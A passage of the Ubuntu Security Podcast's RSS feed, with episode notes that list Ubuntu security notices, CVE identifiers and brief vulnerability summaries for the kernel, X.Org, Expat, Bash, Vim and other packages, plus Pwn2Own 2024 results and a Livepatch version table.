<li><a href="https://ubuntu.com/security/CVE-2022-20567">CVE-2022-20567</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 - generic, kvm, lowlatency, virtual, aws (14.04 only)</li>
<li>UAF in nftables - also originally reported to kCTF</li>
</ul>
<h3 id="usn-6701-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6701-1">USN-6701-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>12 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-24855">CVE-2024-24855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1086">CVE-2024-1086</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0775">CVE-2024-0775</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6121">CVE-2023-6121</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51781">CVE-2023-51781</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46838">CVE-2023-46838</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4132">CVE-2023-4132</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39197">CVE-2023-39197</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34256">CVE-2023-34256</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3006">CVE-2023-3006</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23000">CVE-2023-23000</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2002">CVE-2023-2002</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 - oracle, kvm, aws, generic, lowlatency</li>
<li>UAF in nftables from above and UAF in AppleTalk network driver - <a href="/episode-220/#usn-6648-1-linux-kernel-vulnerabilities--02-00">[USN-6648-1]
Linux kernel vulnerabilities from Episode 220</a></li>
</ul>
<h3 id="usn-6680-3-linux-kernel--aws--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6680-3">USN-6680-3</a>] Linux kernel (AWS) vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-25744">CVE-2024-25744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0607">CVE-2024-0607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6560">CVE-2023-6560</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6121">CVE-2023-6121</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51782">CVE-2023-51782</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51779">CVE-2023-51779</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46343">CVE-2023-46343</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.5 - aws</li>
</ul>
<h3 id="usn-6681-4-linux-kernel--aws--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6681-4">USN-6681-4</a>] Linux kernel (AWS) vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0340">CVE-2024-0340</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6121">CVE-2023-6121</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51782">CVE-2023-51782</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51780">CVE-2023-51780</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51779">CVE-2023-51779</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4244">CVE-2023-4244</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22995">CVE-2023-22995</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44879">CVE-2021-44879</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 - aws</li>
<li>UAF in netfilter discussed earlier</li>
</ul>
<h3 id="usn-6686-3-linux-kernel--oracle--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6686-3">USN-6686-3</a>] Linux kernel (Oracle) vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0607">CVE-2024-0607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0340">CVE-2024-0340</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6121">CVE-2023-6121</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51782">CVE-2023-51782</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51779">CVE-2023-51779</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46862">CVE-2023-46862</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46343">CVE-2023-46343</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4134">CVE-2023-4134</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22995">CVE-2023-22995</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 - oracle</li>
</ul>
<h3 id="usn-6702-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6702-1">USN-6702-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-24855">CVE-2024-24855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1086">CVE-2024-1086</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23004">CVE-2023-23004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23000">CVE-2023-23000</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 - iot, ibm, bluefield, gkeop, kvm, oracle, gcp, generic, lowlatency, oem</li>
<li>Second netfilter UAF above</li>
</ul>
<h3 id="usn-6587-5-x-dot-org-x-server-vulnerabilities--03-34">[<a href="https://ubuntu.com/security/notices/USN-6587-5">USN-6587-5</a>] X.Org X Server vulnerabilities (03:34)</h3>
<ul>
<li>7 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-21886">CVE-2024-21886</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21885">CVE-2024-21885</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0409">CVE-2024-0409</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0408">CVE-2024-0408</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0229">CVE-2024-0229</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6816">CVE-2023-6816</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6478">CVE-2023-6478</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Previous updates for X now available in 14.04 ESM</li>
<li>Most issues either OOB R/W - impact is then can crash X Server or potentially
get code execution - nowadays X runs unprivileged but in 14.04 still runs as
root so these vulns are more severe in the older releases</li>
</ul>
<h3 id="usn-6673-2-python-cryptography-vulnerability--04-21">[<a href="https://ubuntu.com/security/notices/USN-6673-2">USN-6673-2</a>] python-cryptography vulnerability (04:21)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-50782">CVE-2023-50782</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-221/#usn-6673-1-python-cryptography-vulnerabilities--07-30">[USN-6673-1] python-cryptography vulnerabilities from Episode 220</a></li>
</ul>
<h3 id="usn-6695-1-tex-live-vulnerabilities--04-28">[<a href="https://ubuntu.com/security/notices/USN-6695-1">USN-6695-1</a>] TeX Live vulnerabilities (04:28)</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-25262">CVE-2024-25262</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32668">CVE-2023-32668</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18604">CVE-2019-18604</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer overflow via a crafted TTF file</li>
<li>LuaTeX specific issue - allowed a document to make arbitrary network requests
since it didn&rsquo;t disable access to the underlying lua socket library</li>
<li>Misused sprint() resulting in a buffer overflow in the axohelp - helper
program for the LaTeX axodraw2 package when used with pdflatex</li>
</ul>
<h3 id="usn-6694-1-expat-vulnerabilities--05-24">[<a href="https://ubuntu.com/security/notices/USN-6694-1">USN-6694-1</a>] Expat vulnerabilities (05:24)</h3>
<ul>
<li>2 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-28757">CVE-2024-28757</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52425">CVE-2023-52425</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>C library for parsing xml
<ul>
<li>used by many other applications like gdb, dbus, audacity, git, python,
polkit, squid and more</li>
</ul>
</li>
<li>CPU/memory-based DoS since would do many full reparsings of a document in some cases</li>
<li>XML Entity Expansion attack
<ul>
<li><a href="https://en.wikipedia.org/wiki/Billion_laughs_attack">billion laughs attack</a> / XML bomb - 10 entities which each comprise 10 of the
previous entity with the document containing a single instance of the
largest entity - 1 billion copies of the original entity</li>
</ul>
</li>
</ul>
<h3 id="usn-6696-1-openjdk-8-vulnerabilities--06-40">[<a href="https://ubuntu.com/security/notices/USN-6696-1">USN-6696-1</a>] OpenJDK 8 vulnerabilities (06:40)</h3>
<ul>
<li>6 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-20952">CVE-2024-20952</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20945">CVE-2024-20945</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20926">CVE-2024-20926</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20921">CVE-2024-20921</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20919">CVE-2024-20919</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20918">CVE-2024-20918</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-220/#usn-6660-1-usn-6661-1-openjdk-11-and-17-vulnerabilities--08-17">[USN-6660-1, USN-6661-1] OpenJDK 11 &amp; 17 vulnerabilities from Episode 220</a></li>
</ul>
<h3 id="usn-6697-1-bash-vulnerability--07-01">[<a href="https://ubuntu.com/security/notices/USN-6697-1">USN-6697-1</a>] Bash vulnerability (07:01)</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3715">CVE-2022-3715</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer overflow on a valid parameter transformation - can then
unexpectedly lead to possible code execution</li>
</ul>
<h3 id="usn-6698-1-vim-vulnerability--07-30">[<a href="https://ubuntu.com/security/notices/USN-6698-1">USN-6698-1</a>] Vim vulnerability (07:30)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-22667">CVE-2024-22667</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>stack buffer overflow when parsing a crafted command file - ie. the user has
to load a crafted file to be sourced by vim</li>
</ul>
<h3 id="usn-6703-1-firefox-vulnerabilities--07-48">[<a href="https://ubuntu.com/security/notices/USN-6703-1">USN-6703-1</a>] Firefox vulnerabilities (07:48)</h3>
<ul>
<li>11 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-2613">CVE-2024-2613</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-2612">CVE-2024-2612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-2610">CVE-2024-2610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-2608">CVE-2024-2608</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-2607">CVE-2024-2607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-2606">CVE-2024-2606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5388">CVE-2023-5388</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-2615">CVE-2024-2615</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-2614">CVE-2024-2614</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-2611">CVE-2024-2611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-2609">CVE-2024-2609</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>124.0</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="summary-of-pwn2own-vancouver-2024-results-against-ubuntu-23-dot-10--08-05">Summary of Pwn2Own Vancouver 2024 results against Ubuntu 23.10 (08:05)</h3>
<ul>
<li><a href="https://www.zerodayinitiative.com/blog/2024/3/20/pwn2own-vancouver-2024-day-one-results">https://www.zerodayinitiative.com/blog/2024/3/20/pwn2own-vancouver-2024-day-one-results</a></li>
<li>The DEVCORE Team was able to execute their LPE attack against Ubuntu
Linux. However, the bug they used was previously known. They still earn
$10,000 and 1 Master of Pwn points.
<ul>
<li><a href="https://youtube.com/shorts/fXUrMIM2KYc?si=VIR7YKIt86NGEceU">https://youtube.com/shorts/fXUrMIM2KYc?si=VIR7YKIt86NGEceU</a></li>
</ul>
</li>
<li>Kyle Zeng from ASU SEFCOM used an ever tricky race condition to escalate
privileges on Ubuntu Linux desktop. This earns him him $20,000 and 20 Master
of Pwn points.
<ul>
<li><a href="https://www.youtube.com/shorts/HSIasEbEkXY">https://www.youtube.com/shorts/HSIasEbEkXY</a></li>
</ul>
</li>
<li><a href="https://www.zerodayinitiative.com/blog/2024/3/21/pwn2own-vancouver-2024-day-two-results">https://www.zerodayinitiative.com/blog/2024/3/21/pwn2own-vancouver-2024-day-two-results</a></li>
<li>STAR Labs SG successfully demonstrated their privilege escalation on Ubuntu
desktop. However, they used a bug that was previously reported. They still
earn $5,000 and 1 Master of Pwn point.</li>
<li>The final entry of Pwn2Own Vancouver 2024 ends as a collision as Theori used a
bug that was previously know to escalate privileges on Ubuntu desktop. He
still wins $5,000 and 1 Master of Pwn point.</li>
</ul>
<h3 id="reports-of-malicious-themes-in-kde-store--10-27">Reports of malicious themes in KDE Store (10:27)</h3>
<ul>
<li><a href="https://www.bleepingcomputer.com/news/linux/kde-advises-extreme-caution-after-theme-wipes-linux-users-files/">https://www.bleepingcomputer.com/news/linux/kde-advises-extreme-caution-after-theme-wipes-linux-users-files/</a></li>
<li><a href="https://floss.social/@kde/112128243960545659">https://floss.social/@kde/112128243960545659</a></li>
<li><a href="https://www.reddit.com/r/kde/comments/1bixmbx/do_not_install_global_themes_some_wipe_out_all/">https://www.reddit.com/r/kde/comments/1bixmbx/do_not_install_global_themes_some_wipe_out_all/</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E223.mp3" length="17195285" type="audio/mpeg" /><itunes:duration>1034</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 222
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-222/</link>
          <pubDate>Mon, 18 Mar 2024 14:32:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>ff852f280b70cd8d6aa50eaa1d446f2a985c11666f1667ce5118acee340a3de659acc42b1c05f76f07e35f2c7f56a4bf297c94244725986733e7cdcf03cc108b</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 222</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          We cover recent Linux malware from the Magnet Goblin threat actor, plus the news
  of Ubuntu 23.10 as a target in Pwn2Own Vancouver 2024 and we detail
  vulnerabilities in Puma, AccountsService, Open vSwitch, OVN, and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  We cover recent Linux malware from the Magnet Goblin threat actor, plus the news
  of Ubuntu 23.10 as a target in Pwn2Own Vancouver 2024 and we detail
  vulnerabilities in Puma, AccountsService, Open vSwitch, OVN, and more.
  </itunes:summary>
        <description>  We cover recent Linux malware from the Magnet Goblin threat actor, plus the news
  of Ubuntu 23.10 as a target in Pwn2Own Vancouver 2024 and we detail
  vulnerabilities in Puma, AccountsService, Open vSwitch, OVN, and more.
  </description>
        <googleplay:description>  We cover recent Linux malware from the Magnet Goblin threat actor, plus the news
  of Ubuntu 23.10 as a target in Pwn2Own Vancouver 2024 and we detail
  vulnerabilities in Puma, AccountsService, Open vSwitch, OVN, and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>We cover recent Linux malware from the Magnet Goblin threat actor, plus the news
of Ubuntu 23.10 as a target in Pwn2Own Vancouver 2024 and we detail
vulnerabilities in Puma, AccountsService, Open vSwitch, OVN, and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>102 unique CVEs addressed</p>
<h3 id="usn-6679-1-frr-vulnerability--01-11">[<a href="https://ubuntu.com/security/notices/USN-6679-1">USN-6679-1</a>] FRR vulnerability (01:11)</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-27913">CVE-2024-27913</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB read when parsing a malformed OSPF LSA packet - would try and access
attributes fields even if none where present</li>
</ul>
<h3 id="lsn-0101-1-linux-kernel-vulnerability--01-50">[<a href="https://ubuntu.com/security/notices/LSN-0101-1">LSN-0101-1</a>] Linux kernel vulnerability (01:50)</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0646">CVE-2024-0646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0193">CVE-2024-0193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-7192">CVE-2023-7192</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6932">CVE-2023-6932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6817">CVE-2023-6817</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-220/#usn-6648-1-linux-kernel-vulnerabilities--02-00">[USN-6648-1] Linux kernel vulnerabilities from Episode 220</a></li>
<li><a href="/episode-217/#usn-6606-1-linux-kernel--oem--vulnerabilities--03-04">[USN-6606-1] Linux kernel (OEM) vulnerabilities from Episode 217</a></li>
<li><a href="/episode-220/#usn-6647-1-linux-kernel-vulnerabilities--01-14">[USN-6647-1] Linux kernel vulnerabilities from Episode 220</a></li>
<li><a href="/episode-217/#usn-6601-1-linux-kernel-vulnerability--01-16">[USN-6601-1] Linux kernel vulnerability from Episode 217</a></li>
</ul>
<table>
  <thead>
      <tr>
          <th>Kernel type</th>
          <th>22.04</th>
          <th>20.04</th>
          <th>18.04</th>
          <th>16.04</th>
          <th>14.04</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>aws</td>
          <td>101.1</td>
          <td>101.1</td>
          <td>101.1</td>
          <td>101.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-5.15</td>
          <td>—</td>
          <td>101.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>101.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-6.5</td>
          <td>101.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-hwe</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>101.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure</td>
          <td>101.1</td>
          <td>101.1</td>
          <td>—</td>
          <td>101.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>101.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>101.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-6.5</td>
          <td>101.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp</td>
          <td>101.1</td>
          <td>101.1</td>
          <td>—</td>
          <td>101.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>101.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-5.15</td>
          <td>—</td>
          <td>101.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>101.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-6.5</td>
          <td>101.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>101.1</td>
          <td>101.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-4.4</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>101.1</td>
          <td>101.1</td>
      </tr>
      <tr>
          <td>generic-5.15</td>
          <td>—</td>
          <td>101.2</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-5.4</td>
          <td>—</td>
          <td>101.1</td>
          <td>101.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke</td>
          <td>101.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke-5.15</td>
          <td>—</td>
          <td>101.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gkeop</td>
          <td>—</td>
          <td>101.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>hwe-6.5</td>
          <td>101.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>ibm</td>
          <td>101.1</td>
          <td>101.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>ibm-5.15</td>
          <td>—</td>
          <td>101.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>linux</td>
          <td>101.2</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>101.1</td>
          <td>101.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-4.4</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>101.1</td>
          <td>101.1</td>
      </tr>
      <tr>
          <td>lowlatency-5.15</td>
          <td>—</td>
          <td>101.2</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-5.4</td>
          <td>—</td>
          <td>101.1</td>
          <td>101.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
  </tbody>
</table>
<p>To check your kernel type and Livepatch version, enter this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>canonical-livepatch status
</span></span></code></pre></div><h3 id="usn-6680-1-linux-kernel-vulnerabilities--02-47">[<a href="https://ubuntu.com/security/notices/USN-6680-1">USN-6680-1</a>] Linux kernel vulnerabilities (02:47)</h3>
<ul>
<li>7 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-25744">CVE-2024-25744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0607">CVE-2024-0607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6560">CVE-2023-6560</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6121">CVE-2023-6121</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51782">CVE-2023-51782</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51779">CVE-2023-51779</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46343">CVE-2023-46343</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6681-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6681-1">USN-6681-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0340">CVE-2024-0340</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6121">CVE-2023-6121</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51782">CVE-2023-51782</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51780">CVE-2023-51780</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51779">CVE-2023-51779</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4244">CVE-2023-4244</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22995">CVE-2023-22995</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44879">CVE-2021-44879</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6686-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6686-1">USN-6686-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0607">CVE-2024-0607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0340">CVE-2024-0340</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6121">CVE-2023-6121</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51782">CVE-2023-51782</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51779">CVE-2023-51779</a> <!-- raw HTML omitted --></li>
